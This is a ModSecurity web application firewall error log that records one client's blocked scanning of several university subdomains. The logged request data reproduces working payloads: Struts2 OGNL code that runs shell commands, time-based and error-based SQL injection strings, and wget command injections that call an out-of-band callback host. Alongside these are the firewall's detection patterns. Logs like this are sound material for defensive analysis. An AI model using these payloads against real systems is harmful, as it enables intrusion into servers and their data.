[Tue Aug 29 11:33:55.332851 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "unla.ac.id"] [uri "/login.action"] [unique_id "ZO11M8Co-f0AAAR@KKQAAAAF"]
[Tue Aug 29 11:33:55.348192 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "pusatbahasa.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11M8Co-f0AAARjjT8AAAAL"]
[Tue Aug 29 11:33:55.368318 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:item_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:item_id: 0 union select sleep(5) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11M8Co-f0AAASAHfQAAAAH"]
[Tue Aug 29 11:33:55.372642 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "ft.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11M8Co-f0AAARjjUAAAAAL"]
[Tue Aug 29 11:33:55.373194 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "journal.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11M8Co-f0AAARy-18AAAAb"]
[Tue Aug 29 11:33:55.395433 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:account. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:account: admin' and  updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/zentao/user-login.html"] [unique_id "ZO11M8Co-f0AAARQ4E8AAAAB"]
[Tue Aug 29 11:33:55.504593 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:item_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:item_id: 0 union select sleep(5) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11M8Co-f0AAAPDoLYAAAAP"]
[Tue Aug 29 11:33:55.515271 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:item_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:item_id: 0 union select sleep(5) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11M8Co-f0AAARjjUMAAAAL"]
[Tue Aug 29 11:33:55.523236 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:item_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:item_id: 0 union select sleep(5) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11M8Co-f0AAASEJSEAAAAE"]
[Tue Aug 29 11:33:55.541602 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:item_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:item_id: 0 union select sleep(5) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11M8Co-f0AAAPDoLcAAAAP"]
[Tue Aug 29 11:33:57.130276 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.set [hostname "pusatbahasa.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11NcCo-f0AAASHh3YAAAAD"]
[Tue Aug 29 11:33:57.191600 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.set [hostname "informatika.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11NcCo-f0AAASHh3kAAAAD"]
[Tue Aug 29 11:33:57.372872 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:plot. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:plot: ;wget http:/cjmn8l5jmimk2adbbnlg6mqjsmxqqsmqd.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NcCo-f0AAASHh4AAAAAD"]
[Tue Aug 29 11:33:57.387322 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:plot. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:plot: ;wget http:/cjmn8l5jmimk2adbbnlgywyfxht3zyd5z.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NcCo-f0AAARy-24AAAAb"]
[Tue Aug 29 11:33:57.429139 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:plot. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:plot: ;wget http:/cjmn8l5jmimk2adbbnlgkm1jseadh7xwa.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NcCo-f0AAARy-3AAAAAb"]
[Tue Aug 29 11:33:57.505392 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:plot. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:plot: ;wget http:/cjmn8l5jmimk2adbbnlgrj8r6xnrsye1h.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NcCo-f0AAASHh4YAAAAD"]
[Tue Aug 29 11:33:57.512454 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.set [hostname "ft.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11NcCo-f0AAARy-3QAAAAb"]
[Tue Aug 29 11:33:57.591978 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:item_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:item_id: 0 union select sleep(5) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11NcCo-f0AAASHh4kAAAAD"]
[Tue Aug 29 11:33:57.615012 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.set [hostname "journal.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11NcCo-f0AAARy-3kAAAAb"]
[Tue Aug 29 11:33:57.655197 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:plot. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:plot: ;wget http:/cjmn8l5jmimk2adbbnlgr3fy3wgnxi5aw.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NcCo-f0AAARy-3sAAAAb"]
[Tue Aug 29 11:33:57.724593 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.set [hostname "unla.ac.id"] [uri "/index.action"] [unique_id "ZO11NcCo-f0AAASGMrsAAAAA"]
[Tue Aug 29 11:33:58.089234 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id_products[]: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAARxOtUAAAAa"]
[Tue Aug 29 11:33:58.097838 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id_products[]: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAASMgdQAAAAO"]
[Tue Aug 29 11:33:58.112279 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id_products[]: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAASK4b8AAAAI"]
[Tue Aug 29 11:33:58.117548 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id_products[]: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAASNznQAAAAQ"]
[Tue Aug 29 11:33:58.179326 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id_products[]: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAASMgdgAAAAO"]
